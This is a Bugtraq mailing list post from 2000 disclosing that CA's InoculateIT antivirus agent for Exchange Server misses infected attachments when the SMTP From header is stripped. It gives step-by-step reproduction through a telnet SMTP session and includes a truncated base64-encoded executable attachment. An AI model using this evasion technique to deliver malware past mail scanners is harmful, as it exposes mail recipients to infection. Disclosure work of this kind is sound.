Bugtraq mailing list archives
CA's InoculateIT Agent for Exchange Server
From: Hugo Caye <Hugo () MICMAC COM BR>
Date: Fri, 10 Nov 2000 16:29:23 -0200
Hi, I'm new in the list, my 1st msg: The CA's InoculateIT Agent for Exchange Server cannot detect some messages that have the SMTP headers changed. In October/1999 I reported it to local CA support office, but still now nothing have done. Guys at inoc-nt () ca com seem to ignore my messages. The bug can easily be demonstrated telneting on tcp/25 against a EX Srvr with IMC (the MS SMTP connector/service). I simply change some SMTP headers and the CA's AVEX Agent neither opens the attached file that is infected. It is not a signature issue, since I can also send the CA's virtest.com sample file. Any file can be send, since the AVEX Agent doesn't recognize the message as having an attached file. Something like that can be easily done: 1. Get a message containing any infected attached MIME encoded file. I simply filtered out via EX to C:\TurfDir sending from outside to EX; 2. Edit the file (I used MS Notepad.exe) and just remove the "From: ..." line from the SMTP header. Something like this: ==>> Remove this line: From: Test <Test () abc com br> To: Hugo Caye <Hugo () xyz com br> Subject: Test Date: Mon, 23 Oct 2000 10:59:53 -0200 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: application/x-msdownload; name="Fix2001.exe" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="Fix2001.exe" TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAsAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g aW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABjDAXbJ21riCdta4gnbWuIJ21riGRta4ikcWWIJm 1riFJpY2gnbWuIAAAAAAAAAABQRQAATAEDAJ/L0zcAAAAAAAAAAOAADwELAQUMABoAAAAA AgAAAAAAABAAAAAQAAAAMAAA... <<== Removed the rest here; 3. Copy the Notepad content to clipboard; 4. Issue "telnet your_exsrvr 25" command: 220 aaa.xyz.com.br ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2650.21) ready helo 250 OK mail from:<> 250 OK - mail from <> rcpt to:<hugo () xyz com br> 250 OK - Recipient <hugo () xyz com br> data 354 Send data. End with CRLF.CRLF ==>> Here, paste from clipboard (Win2K, just a mouse right-click). Something like this: To: Hugo Caye <Hugo () xyz com br> Subject: Test Date: Mon, 23 Oct 2000 10:59:53 -0200 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: application/x-msdownload; name="Fix2001.exe" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="Fix2001.exe" TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAsAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g aW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABjDAXbJ21riCdta4gnbWuIJ21riGRta4ikcWWIJm 1riFJpY2gnbWuIAAAAAAAAAABQRQAATAEDAJ/L0zcAAAAAAAAAAOAADwELAQUMABoAAAAA AgAAAAAAABAAAAAQAAAAMAAA... <<== Removed... ....AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA . 250 OK quit 221 closing connection 5. Message sent, CA's Agent will not detect the infected file. This is one manner to exploit the Agent. There are at least more two holes. I'm not talking about the weaknesses of embedded messages and server based rules. Both big holes recognized by CA. How can this bug become public, CA recognize it and _fix_ it? Hugo Caye O__ ---- c/ /'_ --- (*) \(*) -- ~~~~~~~~ ccna ccda mcne³ ncip mcse cne5
Current thread:
- CA's InoculateIT Agent for Exchange Server Hugo Caye (Nov 11)